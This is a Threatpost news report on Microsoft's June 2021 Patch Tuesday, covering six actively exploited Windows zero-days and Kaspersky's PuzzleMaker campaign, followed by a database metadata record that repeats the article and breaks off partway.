Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits

2021-06-08T21:45:12

Description

Microsoft jumped on 50 vulnerabilities in this month’s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop. Five of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release. The number might seem light – it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) – but the number of critical vulnerabilities ticked up to five month-over-month. [![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) Those actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority. The six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability. ## Critical Bugs of Note [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft’s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year’s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit. Another critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability “could take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.” While Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don’t let it slide: “Patching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,” he observed. [![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>) A year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos ## Bugs Exploited in the Wild Microsoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn’t been seen in attacks. It was issued a CVSS score of 7.5. These are the six flaws that MIcrosoft said are under active attack, all of them also zero days. * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) – Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5 * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) – Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8 * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) – Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4 * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5 * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 ## CVE-2021-33742 This RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)‘s (ZDI’s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. “It’s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,” he recommended. The vulnerability doesn’t require special privilege to exploit, though the attack complexity is high, if that’s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday. Immersive Labs’ Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is “a simple way for attackers to deliver this exploit.” He told Threatpost via email on Tuesday that since the library is used by other services and applications, “emailing HTML files as part of a phishing campaign is also a viable method of delivery.” [Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month’s crop, given that it’s already being actively exploited by malicious actors. ## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware CVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI’s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: “It’s possible these bugs were used in conjunction, as that is a common technique – use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.” He was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two. In a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target “the latest and most prominent builds” of Windows 10. “Recent months have seen a wave of advanced threat activity exploiting zero-days in the wild,” according to the release. “In mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.” Kaspersky hasn’t yet found a connection between these attacks and any known threat actors, so it’s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren’t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users’ tabs). Kaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug “is affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,” they explained. The second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) “to create arbitrary memory read/write primitives and execute malware modules with system privileges.” “Once the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,” they continued. “This dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.” Boris Larin, senior security researcher with Kaspersky’s Global Research and Analysis Team (GReAT), said that the team hasn’t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape “for future activity or new insights about this group,” he was quoted as saying in the press release. If the current trend is any indication, expect to see more of the same, Larin said. “Overall, of late, we’ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,” he said. “It’s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it’s possible that we’ll see an increase of their usage in attacks by this and other threat actors. That means it’s very important for users to download the latest patch from Microsoft as soon as possible.” ## CVE-2021-31199/CVE-2021-31201 The two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. “It’s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,” he explained. “It is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.” ## CVE-2021-33739 Breen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. “Once they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,” he said. “This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.” **Download our exclusive FREE Threatpost Insider eBook, ****_“_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,”_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what’s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now – on us!**

{"id": "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits", "description": "Microsoft jumped on 50 vulnerabilities in this month\u2019s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code \u2013 Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nFive of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.\n\nThe number might seem light \u2013 it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) \u2013 but the number of critical vulnerabilities ticked up to five month-over-month.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThose actively exploited vulnerabilities can enable an attacker to hijack a system. They have no workarounds, so some security experts are recommending that they be patched as the highest priority.\n\nThe six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.\n\n## Critical Bugs of Note\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft\u2019s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year\u2019s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.\n\nAnother critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability \u201ccould take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.\u201d \nWhile Microsoft reports that this vulnerability is less likely to be exploited,Goodman suggested that organizations don\u2019t let it slide: \u201cPatching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,\u201d he observed.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>)\n\nA year-to-date summary of 2021 Microsoft vulnerability releases as of June. Source: Sophos\n\n## Bugs Exploited in the Wild\n\nMicrosoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn\u2019t been seen in attacks. It was issued a CVSS score of 7.5.\n\nThese are the six flaws that MIcrosoft said are under active attack, all of them also zero days.\n\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8\n * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5\n * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n\n## CVE-2021-33742\n\nThis RCE vulnerability exploits MSHTML, a component used by the Internet Explorer engine to read and display content from websites.The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)\u2018s (ZDI\u2019s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. \u201cIt\u2019s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,\u201d he recommended.\n\nThe vulnerability doesn\u2019t require special privilege to exploit, though the attack complexity is high, if that\u2019s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is \u201ca simple way for attackers to deliver this exploit.\u201d He told Threatpost via email on Tuesday that since the library is used by other services and applications, \u201cemailing HTML files as part of a phishing campaign is also a viable method of delivery.\u201d\n\n[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month\u2019s crop, given that it\u2019s already being actively exploited by malicious actors.\n\n## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware\n\nCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI\u2019s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. They could be linked, he suggested: \u201cIt\u2019s possible these bugs were used in conjunction, as that is a common technique \u2013 use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.\u201d\n\nHe was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.\n\nIn a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target \u201cthe latest and most prominent builds\u201d of Windows 10.\n\n\u201cRecent months have seen a wave of advanced threat activity exploiting zero-days in the wild,\u201d according to the release. \u201cIn mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.\u201d\n\nKaspersky hasn\u2019t yet found a connection between these attacks and any known threat actors, so it\u2019s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. Kaspersky researchers weren\u2019t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users\u2019 tabs).\n\nKaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug \u201cis affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,\u201d they explained.\n\nThe second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) \u201cto create arbitrary memory read/write primitives and execute malware modules with system privileges.\u201d\n\n\u201cOnce the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,\u201d they continued. \u201cThis dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.\u201d\n\nBoris Larin, senior security researcher with Kaspersky\u2019s Global Research and Analysis Team (GReAT), said that the team hasn\u2019t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape \u201cfor future activity or new insights about this group,\u201d he was quoted as saying in the press release.\n\nIf the current trend is any indication, expect to see more of the same, Larin said. \u201cOverall, of late, we\u2019ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,\u201d he said. \u201cIt\u2019s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it\u2019s possible that we\u2019ll see an increase of their usage in attacks by this and other threat actors. That means it\u2019s very important for users to download the latest patch from Microsoft as soon as possible.\u201d\n\n## CVE-2021-31199/CVE-2021-31201\n\nThe two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. \u201cIt\u2019s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,\u201d he explained. \u201cIt is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.\u201d\n\n## CVE-2021-33739\n\nBreen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. \u201cOnce they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,\u201d he said. \u201cThis can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "published": "2021-06-08T21:45:12", "modified": "2021-06-08T21:45:12", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "reporter": "Lisa Vaas", "references": ["https://msrc.microsoft.com/update-guide", "https://threatpost.com/wormable-windows-bug-dos-rce/166057/", "https://threatpost.com/newsletter-sign/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985", "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963", "https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021", "https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201", "https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review", "https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/", "https://www.cvedetails.com/cve/CVE-2021-21224", "https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/", "https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART", "https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART"], "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "immutableFields": [], "lastseen": "2021-06-08T22:18:00", "viewCount": 178, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB21-29"]}, {"type": "archlinux", "idList": ["ASA-202104-5", "ASA-202104-7"]}, {"type": "attackerkb", "idList": ["AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "AKB:86197DAF-4CA4-4CD7-B1A5-5F00DE015C96", "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0278", "CPAI-2021-0314", "CPAI-2021-0316", "CPAI-2021-0317", "CPAI-2021-0318", "CPAI-2021-0381", "CPAI-2021-0485", "CPAI-2021-0952"]}, {"type": "chrome", "idList": ["GCSA-1247606144415232205"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-21224", "CISA-KEV-CVE-2021-28550", "CISA-KEV-CVE-2021-31199", "CISA-KEV-CVE-2021-31201", "CISA-KEV-CVE-2021-31955", "CISA-KEV-CVE-2021-31956", "CISA-KEV-CVE-2021-33739", "CISA-KEV-CVE-2021-33742"]}, {"type": "cve", "idList": ["CVE-2021-21224", "CVE-2021-26420", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31966", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4906-1:4BE22"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21224"]}, {"type": "fedora", "idList": ["FEDORA:993DD30E4796", "FEDORA:B4C4A30D8539", "FEDORA:D63AA304E89C"]}, {"type": "freebsd", "idList": ["CB13A765-A277-11EB-97A0-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["399B15EF-A742-5722-86D2-59F3580C307B", "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "ACB6F5C0-7366-5D78-A7CE-F7ABD8C63974", "CAE25BF5-2DB9-5000-8FF9-CC2EAA626ECE", "D55547F1-B835-5BEB-A606-6A8E4C920574", "DF22F016-E2AB-572D-ACF8-DEB4E1C4FED5"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA12147", "KLA12153", "KLA12197", "KLA12198", "KLA12201", "KLA12202"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3"]}, {"type": "mmpc", "idList": ["MMPC:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21224", "MS:CVE-2021-26420", "MS:CVE-2021-31199", "MS:CVE-2021-31201", "MS:CVE-2021-31955", "MS:CVE-2021-31956", "MS:CVE-2021-31963", "MS:CVE-2021-31966", "MS:CVE-2021-31968", "MS:CVE-2021-31985", "MS:CVE-2021-33739", "MS:CVE-2021-33742"]}, {"type": "mskb", "idList": ["KB4011698", "KB5001944", "KB5001946", "KB5001954", "KB5001962", "KB5003635", "KB5003637"]}, {"type": "mssecure", "idList": ["MSSECURE:85647D37E79AFEF2BFF74B4682648C5E"]}, {"type": "nessus", "idList": ["ADOBE_ACROBAT_APSB21-29.NASL", "ADOBE_READER_APSB21-29.NASL", "DEBIAN_DSA-4906.NASL", "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_90_0_4430_85.NASL", "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "MACOS_ADOBE_READER_APSB21-29.NASL", "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "OPENSUSE-2021-629.NASL", "OPENSUSE-2021-712.NASL", "SMB_NT_MS21_JUNE_FEP.NASL", "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS21_JUNE_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS21_JUNE_WIN_DEFENDER.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "WEB_APPLICATION_SCANNING_112929", "WEB_APPLICATION_SCANNING_112930", "WEB_APPLICATION_SCANNING_112931"]}, {"type": "osv", "idList": ["OSV:DSA-4906-1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:8BBBF7B71E6D52B912070367475B6567", "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0629-1", "OPENSUSE-SU-2021:0712-1"]}, {"type": "thn", "idList": ["THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:6A9CD6F085628D08978727C0FF597535", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:8243BE07E124CAD984B8B4895550A7CC", "THN:B7217784F9D53002315C9C43CCC73766", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "THN:FF8DAEC0AE0DDAE827D57407C51BE992"]}, {"type": "threatpost", "idList": ["THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:474207FB444B779CD6B86ABEA0D24054", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:DE317ED7C5E4858FE861A15F96F6BCFD", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21224"]}, {"type": "veracode", "idList": ["VERACODE:30147", "VERACODE:31029"]}]}, "score": {"value": 0.7, "vector": 